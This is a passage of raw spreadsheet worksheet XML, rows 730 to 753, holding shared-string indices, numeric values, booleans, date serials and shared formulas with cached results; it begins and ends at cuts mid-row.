      <c r="J730" s="1" t="s">
        <v>3260</v>
      </c>
      <c r="K730" s="2" t="s">
        <v>3261</v>
      </c>
      <c r="L730" s="1">
        <v>17.0</v>
      </c>
      <c r="M730" s="1">
        <v>21.0</v>
      </c>
      <c r="N730" s="1" t="s">
        <v>237</v>
      </c>
      <c r="O730" s="1" t="s">
        <v>3262</v>
      </c>
      <c r="P730" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q730" s="1">
        <f t="shared" si="1"/>
        <v>7</v>
      </c>
      <c r="R730" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S730" s="1">
        <f t="shared" si="3"/>
        <v>13</v>
      </c>
    </row>
    <row r="731">
      <c r="A731" s="1">
        <v>9956.0</v>
      </c>
      <c r="B731" s="2" t="s">
        <v>3277</v>
      </c>
      <c r="C731" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D731" s="2" t="s">
        <v>3257</v>
      </c>
      <c r="E731" s="2" t="s">
        <v>1301</v>
      </c>
      <c r="F731" s="1" t="s">
        <v>3278</v>
      </c>
      <c r="G731" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H731" s="1" t="s">
        <v>3279</v>
      </c>
      <c r="I731" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J731" s="1" t="s">
        <v>3260</v>
      </c>
      <c r="K731" s="2" t="s">
        <v>3261</v>
      </c>
      <c r="L731" s="1">
        <v>17.0</v>
      </c>
      <c r="M731" s="1">
        <v>21.0</v>
      </c>
      <c r="N731" s="1" t="s">
        <v>78</v>
      </c>
      <c r="O731" s="1" t="s">
        <v>3262</v>
      </c>
      <c r="P731" s="1" t="s">
        <v>2216</v>
      </c>
      <c r="Q731" s="1">
        <f t="shared" si="1"/>
        <v>7</v>
      </c>
      <c r="R731" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S731" s="1">
        <f t="shared" si="3"/>
        <v>13</v>
      </c>
    </row>
    <row r="732">
      <c r="A732" s="1">
        <v>9959.0</v>
      </c>
      <c r="B732" s="2" t="s">
        <v>3280</v>
      </c>
      <c r="C732" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D732" s="2" t="s">
        <v>3257</v>
      </c>
      <c r="E732" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F732" s="1" t="s">
        <v>3281</v>
      </c>
      <c r="G732" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H732" s="1" t="s">
        <v>3282</v>
      </c>
      <c r="I732" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J732" s="1" t="s">
        <v>3260</v>
      </c>
      <c r="K732" s="2" t="s">
        <v>3261</v>
      </c>
      <c r="L732" s="1">
        <v>17.0</v>
      </c>
      <c r="M732" s="1">
        <v>21.0</v>
      </c>
      <c r="N732" s="1" t="s">
        <v>71</v>
      </c>
      <c r="O732" s="1" t="s">
        <v>3262</v>
      </c>
      <c r="P732" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q732" s="1">
        <f t="shared" si="1"/>
        <v>7</v>
      </c>
      <c r="R732" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S732" s="1">
        <f t="shared" si="3"/>
        <v>13</v>
      </c>
    </row>
    <row r="733">
      <c r="A733" s="1">
        <v>9962.0</v>
      </c>
      <c r="B733" s="2" t="s">
        <v>3283</v>
      </c>
      <c r="C733" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D733" s="2" t="s">
        <v>3284</v>
      </c>
      <c r="E733" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F733" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G733" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H733" s="4">
        <v>43993.76111111111</v>
      </c>
      <c r="I733" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J733" s="1" t="s">
        <v>3285</v>
      </c>
      <c r="K733" s="2" t="s">
        <v>3286</v>
      </c>
      <c r="L733" s="1">
        <v>1.0</v>
      </c>
      <c r="M733" s="1">
        <v>1.0</v>
      </c>
      <c r="N733" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O733" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P733" s="1" t="s">
        <v>970</v>
      </c>
      <c r="Q733" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R733" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S733" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="734">
      <c r="A734" s="1">
        <v>9963.0</v>
      </c>
      <c r="B734" s="2" t="s">
        <v>3287</v>
      </c>
      <c r="C734" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D734" s="2" t="s">
        <v>3288</v>
      </c>
      <c r="E734" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F734" s="1" t="s">
        <v>3289</v>
      </c>
      <c r="G734" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H734" s="1" t="s">
        <v>3290</v>
      </c>
      <c r="I734" s="1" t="s">
        <v>3291</v>
      </c>
      <c r="J734" s="1" t="s">
        <v>3292</v>
      </c>
      <c r="K734" s="2" t="s">
        <v>3293</v>
      </c>
      <c r="L734" s="1">
        <v>3.0</v>
      </c>
      <c r="M734" s="1">
        <v>4.0</v>
      </c>
      <c r="N734" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O734" s="1" t="s">
        <v>3294</v>
      </c>
      <c r="P734" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q734" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R734" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S734" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="735">
      <c r="A735" s="1">
        <v>9964.0</v>
      </c>
      <c r="B735" s="2" t="s">
        <v>3295</v>
      </c>
      <c r="C735" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D735" s="2" t="s">
        <v>3288</v>
      </c>
      <c r="E735" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F735" s="1" t="s">
        <v>3296</v>
      </c>
      <c r="G735" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H735" s="1" t="s">
        <v>3297</v>
      </c>
      <c r="I735" s="1" t="s">
        <v>3291</v>
      </c>
      <c r="J735" s="1" t="s">
        <v>3292</v>
      </c>
      <c r="K735" s="2" t="s">
        <v>3293</v>
      </c>
      <c r="L735" s="1">
        <v>3.0</v>
      </c>
      <c r="M735" s="1">
        <v>4.0</v>
      </c>
      <c r="N735" s="1" t="s">
        <v>1497</v>
      </c>
      <c r="O735" s="1" t="s">
        <v>3294</v>
      </c>
      <c r="P735" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q735" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R735" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S735" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="736">
      <c r="A736" s="1">
        <v>9966.0</v>
      </c>
      <c r="B736" s="2" t="s">
        <v>3298</v>
      </c>
      <c r="C736" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D736" s="2" t="s">
        <v>3288</v>
      </c>
      <c r="E736" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F736" s="1" t="s">
        <v>3299</v>
      </c>
      <c r="G736" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H736" s="4">
        <v>44295.02361111111</v>
      </c>
      <c r="I736" s="1" t="s">
        <v>3291</v>
      </c>
      <c r="J736" s="1" t="s">
        <v>3292</v>
      </c>
      <c r="K736" s="2" t="s">
        <v>3293</v>
      </c>
      <c r="L736" s="1">
        <v>3.0</v>
      </c>
      <c r="M736" s="1">
        <v>4.0</v>
      </c>
      <c r="N736" s="1" t="s">
        <v>3300</v>
      </c>
      <c r="O736" s="1" t="s">
        <v>3294</v>
      </c>
      <c r="P736" s="1" t="s">
        <v>510</v>
      </c>
      <c r="Q736" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R736" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S736" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="737">
      <c r="A737" s="1">
        <v>9967.0</v>
      </c>
      <c r="B737" s="2" t="s">
        <v>3301</v>
      </c>
      <c r="C737" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D737" s="2" t="s">
        <v>3302</v>
      </c>
      <c r="E737" s="2" t="s">
        <v>2103</v>
      </c>
      <c r="F737" s="1" t="s">
        <v>182</v>
      </c>
      <c r="G737" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H737" s="1" t="s">
        <v>3303</v>
      </c>
      <c r="I737" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J737" s="1" t="s">
        <v>3304</v>
      </c>
      <c r="K737" s="2" t="s">
        <v>3305</v>
      </c>
      <c r="L737" s="1">
        <v>1.0</v>
      </c>
      <c r="M737" s="1">
        <v>1.0</v>
      </c>
      <c r="N737" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O737" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P737" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q737" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R737" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S737" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="738">
      <c r="A738" s="1">
        <v>9968.0</v>
      </c>
      <c r="B738" s="2" t="s">
        <v>3306</v>
      </c>
      <c r="C738" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D738" s="2" t="s">
        <v>3302</v>
      </c>
      <c r="E738" s="2" t="s">
        <v>2103</v>
      </c>
      <c r="F738" s="1" t="s">
        <v>3307</v>
      </c>
      <c r="G738" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H738" s="1" t="s">
        <v>3308</v>
      </c>
      <c r="I738" s="1" t="s">
        <v>34</v>
      </c>
      <c r="J738" s="1" t="s">
        <v>3309</v>
      </c>
      <c r="K738" s="2" t="s">
        <v>3310</v>
      </c>
      <c r="L738" s="1">
        <v>5.0</v>
      </c>
      <c r="M738" s="1">
        <v>20.0</v>
      </c>
      <c r="N738" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O738" s="1" t="s">
        <v>385</v>
      </c>
      <c r="P738" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q738" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R738" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S738" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="739">
      <c r="A739" s="1">
        <v>9969.0</v>
      </c>
      <c r="B739" s="2" t="s">
        <v>3311</v>
      </c>
      <c r="C739" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D739" s="2" t="s">
        <v>3302</v>
      </c>
      <c r="E739" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F739" s="1" t="s">
        <v>3312</v>
      </c>
      <c r="G739" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H739" s="1" t="s">
        <v>3313</v>
      </c>
      <c r="I739" s="1" t="s">
        <v>34</v>
      </c>
      <c r="J739" s="1" t="s">
        <v>3309</v>
      </c>
      <c r="K739" s="2" t="s">
        <v>3310</v>
      </c>
      <c r="L739" s="1">
        <v>5.0</v>
      </c>
      <c r="M739" s="1">
        <v>20.0</v>
      </c>
      <c r="N739" s="1" t="s">
        <v>187</v>
      </c>
      <c r="O739" s="1" t="s">
        <v>385</v>
      </c>
      <c r="P739" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q739" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R739" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S739" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="740">
      <c r="A740" s="1">
        <v>9971.0</v>
      </c>
      <c r="B740" s="2" t="s">
        <v>3314</v>
      </c>
      <c r="C740" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D740" s="2" t="s">
        <v>3302</v>
      </c>
      <c r="E740" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F740" s="1" t="s">
        <v>3315</v>
      </c>
      <c r="G740" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H740" s="1" t="s">
        <v>3316</v>
      </c>
      <c r="I740" s="1" t="s">
        <v>34</v>
      </c>
      <c r="J740" s="1" t="s">
        <v>3309</v>
      </c>
      <c r="K740" s="2" t="s">
        <v>3310</v>
      </c>
      <c r="L740" s="1">
        <v>5.0</v>
      </c>
      <c r="M740" s="1">
        <v>20.0</v>
      </c>
      <c r="N740" s="1" t="s">
        <v>199</v>
      </c>
      <c r="O740" s="1" t="s">
        <v>385</v>
      </c>
      <c r="P740" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q740" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R740" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S740" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="741">
      <c r="A741" s="1">
        <v>9988.0</v>
      </c>
      <c r="B741" s="2" t="s">
        <v>3317</v>
      </c>
      <c r="C741" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D741" s="2" t="s">
        <v>3302</v>
      </c>
      <c r="E741" s="2" t="s">
        <v>135</v>
      </c>
      <c r="F741" s="1" t="s">
        <v>3318</v>
      </c>
      <c r="G741" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H741" s="1" t="s">
        <v>3319</v>
      </c>
      <c r="I741" s="1" t="s">
        <v>3320</v>
      </c>
      <c r="J741" s="1" t="s">
        <v>3321</v>
      </c>
      <c r="K741" s="2" t="s">
        <v>3310</v>
      </c>
      <c r="L741" s="1">
        <v>1.0</v>
      </c>
      <c r="M741" s="1">
        <v>1.0</v>
      </c>
      <c r="N741" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O741" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P741" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q741" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R741" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S741" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="742">
      <c r="A742" s="1">
        <v>9989.0</v>
      </c>
      <c r="B742" s="2" t="s">
        <v>3322</v>
      </c>
      <c r="C742" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D742" s="2" t="s">
        <v>3302</v>
      </c>
      <c r="E742" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F742" s="1" t="s">
        <v>3323</v>
      </c>
      <c r="G742" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H742" s="1" t="s">
        <v>3324</v>
      </c>
      <c r="I742" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J742" s="1" t="s">
        <v>3325</v>
      </c>
      <c r="K742" s="2" t="s">
        <v>3310</v>
      </c>
      <c r="L742" s="1">
        <v>4.0</v>
      </c>
      <c r="M742" s="1">
        <v>4.0</v>
      </c>
      <c r="N742" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O742" s="1" t="s">
        <v>3326</v>
      </c>
      <c r="P742" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q742" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R742" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S742" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="743">
      <c r="A743" s="1">
        <v>9992.0</v>
      </c>
      <c r="B743" s="2" t="s">
        <v>3327</v>
      </c>
      <c r="C743" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D743" s="2" t="s">
        <v>3302</v>
      </c>
      <c r="E743" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F743" s="1" t="s">
        <v>3328</v>
      </c>
      <c r="G743" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H743" s="1" t="s">
        <v>3329</v>
      </c>
      <c r="I743" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J743" s="1" t="s">
        <v>3325</v>
      </c>
      <c r="K743" s="2" t="s">
        <v>3310</v>
      </c>
      <c r="L743" s="1">
        <v>4.0</v>
      </c>
      <c r="M743" s="1">
        <v>4.0</v>
      </c>
      <c r="N743" s="1" t="s">
        <v>3330</v>
      </c>
      <c r="O743" s="1" t="s">
        <v>3326</v>
      </c>
      <c r="P743" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q743" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R743" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S743" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="744">
      <c r="A744" s="1">
        <v>9994.0</v>
      </c>
      <c r="B744" s="2" t="s">
        <v>3331</v>
      </c>
      <c r="C744" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D744" s="2" t="s">
        <v>3302</v>
      </c>
      <c r="E744" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F744" s="1" t="s">
        <v>3332</v>
      </c>
      <c r="G744" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H744" s="1" t="s">
        <v>3333</v>
      </c>
      <c r="I744" s="1" t="s">
        <v>814</v>
      </c>
      <c r="J744" s="1" t="s">
        <v>3334</v>
      </c>
      <c r="K744" s="2" t="s">
        <v>3310</v>
      </c>
      <c r="L744" s="1">
        <v>3.0</v>
      </c>
      <c r="M744" s="1">
        <v>4.0</v>
      </c>
      <c r="N744" s="1" t="s">
        <v>3335</v>
      </c>
      <c r="O744" s="1" t="s">
        <v>3336</v>
      </c>
      <c r="P744" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q744" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R744" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S744" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="745">
      <c r="A745" s="1">
        <v>9995.0</v>
      </c>
      <c r="B745" s="2" t="s">
        <v>3337</v>
      </c>
      <c r="C745" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D745" s="2" t="s">
        <v>3302</v>
      </c>
      <c r="E745" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F745" s="1" t="s">
        <v>2612</v>
      </c>
      <c r="G745" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H745" s="1" t="s">
        <v>3338</v>
      </c>
      <c r="I745" s="1" t="s">
        <v>814</v>
      </c>
      <c r="J745" s="1" t="s">
        <v>3334</v>
      </c>
      <c r="K745" s="2" t="s">
        <v>3310</v>
      </c>
      <c r="L745" s="1">
        <v>3.0</v>
      </c>
      <c r="M745" s="1">
        <v>4.0</v>
      </c>
      <c r="N745" s="1" t="s">
        <v>3339</v>
      </c>
      <c r="O745" s="1" t="s">
        <v>3336</v>
      </c>
      <c r="P745" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q745" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R745" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S745" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="746">
      <c r="A746" s="1">
        <v>9997.0</v>
      </c>
      <c r="B746" s="2" t="s">
        <v>3340</v>
      </c>
      <c r="C746" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D746" s="2" t="s">
        <v>3302</v>
      </c>
      <c r="E746" s="2" t="s">
        <v>135</v>
      </c>
      <c r="F746" s="1" t="s">
        <v>2384</v>
      </c>
      <c r="G746" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H746" s="1" t="s">
        <v>3341</v>
      </c>
      <c r="I746" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J746" s="1" t="s">
        <v>3342</v>
      </c>
      <c r="K746" s="2" t="s">
        <v>3310</v>
      </c>
      <c r="L746" s="1">
        <v>4.0</v>
      </c>
      <c r="M746" s="1">
        <v>4.0</v>
      </c>
      <c r="N746" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O746" s="1" t="s">
        <v>3343</v>
      </c>
      <c r="P746" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q746" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R746" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S746" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="747">
      <c r="A747" s="1">
        <v>9999.0</v>
      </c>
      <c r="B747" s="2" t="s">
        <v>3344</v>
      </c>
      <c r="C747" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D747" s="2" t="s">
        <v>3302</v>
      </c>
      <c r="E747" s="2" t="s">
        <v>517</v>
      </c>
      <c r="F747" s="1" t="s">
        <v>112</v>
      </c>
      <c r="G747" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H747" s="1" t="s">
        <v>3345</v>
      </c>
      <c r="I747" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J747" s="1" t="s">
        <v>3342</v>
      </c>
      <c r="K747" s="2" t="s">
        <v>3310</v>
      </c>
      <c r="L747" s="1">
        <v>4.0</v>
      </c>
      <c r="M747" s="1">
        <v>4.0</v>
      </c>
      <c r="N747" s="1" t="s">
        <v>402</v>
      </c>
      <c r="O747" s="1" t="s">
        <v>3343</v>
      </c>
      <c r="P747" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q747" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R747" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S747" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="748">
      <c r="A748" s="1">
        <v>10000.0</v>
      </c>
      <c r="B748" s="2" t="s">
        <v>3346</v>
      </c>
      <c r="C748" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D748" s="2" t="s">
        <v>3302</v>
      </c>
      <c r="E748" s="2" t="s">
        <v>517</v>
      </c>
      <c r="F748" s="1" t="s">
        <v>3347</v>
      </c>
      <c r="G748" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H748" s="1" t="s">
        <v>3348</v>
      </c>
      <c r="I748" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J748" s="1" t="s">
        <v>3342</v>
      </c>
      <c r="K748" s="2" t="s">
        <v>3310</v>
      </c>
      <c r="L748" s="1">
        <v>4.0</v>
      </c>
      <c r="M748" s="1">
        <v>4.0</v>
      </c>
      <c r="N748" s="1" t="s">
        <v>3349</v>
      </c>
      <c r="O748" s="1" t="s">
        <v>3343</v>
      </c>
      <c r="P748" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q748" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R748" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S748" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="749">
      <c r="A749" s="1">
        <v>10001.0</v>
      </c>
      <c r="B749" s="2" t="s">
        <v>3350</v>
      </c>
      <c r="C749" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D749" s="2" t="s">
        <v>3302</v>
      </c>
      <c r="E749" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F749" s="1" t="s">
        <v>3351</v>
      </c>
      <c r="G749" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H749" s="1" t="s">
        <v>3352</v>
      </c>
      <c r="I749" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J749" s="1" t="s">
        <v>3353</v>
      </c>
      <c r="K749" s="2" t="s">
        <v>3310</v>
      </c>
      <c r="L749" s="1">
        <v>6.0</v>
      </c>
      <c r="M749" s="1">
        <v>12.0</v>
      </c>
      <c r="N749" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O749" s="1" t="s">
        <v>3354</v>
      </c>
      <c r="P749" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q749" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R749" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S749" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="750">
      <c r="A750" s="1">
        <v>10002.0</v>
      </c>
      <c r="B750" s="2" t="s">
        <v>3355</v>
      </c>
      <c r="C750" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D750" s="2" t="s">
        <v>3302</v>
      </c>
      <c r="E750" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F750" s="1" t="s">
        <v>771</v>
      </c>
      <c r="G750" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H750" s="1" t="s">
        <v>3356</v>
      </c>
      <c r="I750" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J750" s="1" t="s">
        <v>3353</v>
      </c>
      <c r="K750" s="2" t="s">
        <v>3310</v>
      </c>
      <c r="L750" s="1">
        <v>6.0</v>
      </c>
      <c r="M750" s="1">
        <v>12.0</v>
      </c>
      <c r="N750" s="1" t="s">
        <v>1497</v>
      </c>
      <c r="O750" s="1" t="s">
        <v>3354</v>
      </c>
      <c r="P750" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q750" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R750" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S750" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="751">
      <c r="A751" s="1">
        <v>10004.0</v>
      </c>
      <c r="B751" s="2" t="s">
        <v>3357</v>
      </c>
      <c r="C751" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D751" s="2" t="s">
        <v>3302</v>
      </c>
      <c r="E751" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F751" s="1" t="s">
        <v>3351</v>
      </c>
      <c r="G751" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H751" s="1" t="s">
        <v>3358</v>
      </c>
      <c r="I751" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J751" s="1" t="s">
        <v>3353</v>
      </c>
      <c r="K751" s="2" t="s">
        <v>3310</v>
      </c>
      <c r="L751" s="1">
        <v>6.0</v>
      </c>
      <c r="M751" s="1">
        <v>12.0</v>
      </c>
      <c r="N751" s="1" t="s">
        <v>455</v>
      </c>
      <c r="O751" s="1" t="s">
        <v>3354</v>
      </c>
      <c r="P751" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q751" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R751" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S751" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="752">
      <c r="A752" s="1">
        <v>10007.0</v>
      </c>
      <c r="B752" s="2" t="s">
        <v>3359</v>
      </c>
      <c r="C752" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D752" s="2" t="s">
        <v>3302</v>
      </c>
      <c r="E752" s="2" t="s">
        <v>2103</v>
      </c>
      <c r="F752" s="1" t="s">
        <v>3360</v>
      </c>
      <c r="G752" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H752" s="1" t="s">
        <v>3361</v>
      </c>
      <c r="I752" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J752" s="1" t="s">
        <v>3353</v>
      </c>
      <c r="K752" s="2" t="s">
        <v>3310</v>
      </c>
      <c r="L752" s="1">
        <v>6.0</v>
      </c>
      <c r="M752" s="1">
        <v>12.0</v>
      </c>
      <c r="N752" s="1" t="s">
        <v>281</v>
      </c>
      <c r="O752" s="1" t="s">
        <v>3354</v>
      </c>
      <c r="P752" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q752" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R752" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S752" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="753">
      <c r="A753" s="1">
        <v>10009.0</v>
      </c>
      <c r="B753" s="2" t="s">
        <v>3362</v>
      </c>
      <c r="C753" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D753" s="2" t="s">
        <v>3302</v>
      </c>
      <c r="E753" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F753" s="1" t="s">
        <v>3363</v>
      </c>
      <c r="G753" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H753" s="1" t="s">
        <v>3364</v>
      </c>
      <c r="I753" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J753" s="1" t="s">
        <v>3353</v>
      </c>
      <c r="K753" s="2" t="s">
        <v>3310</v>
      </c>
      <c r="L753" s="1">
        <v>6.0</v>
      </c>
      <c r="M753" s="1">
        <v>12.0</v>
      </c>
      <c r="N753" s="1" t="s">
        <v>3365</v>
      </c>
      <c r="O753" s="1" t="s">
        <v>3354</v>
      </c>
      <c r="P753" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q753" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R753" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S753" s="1">
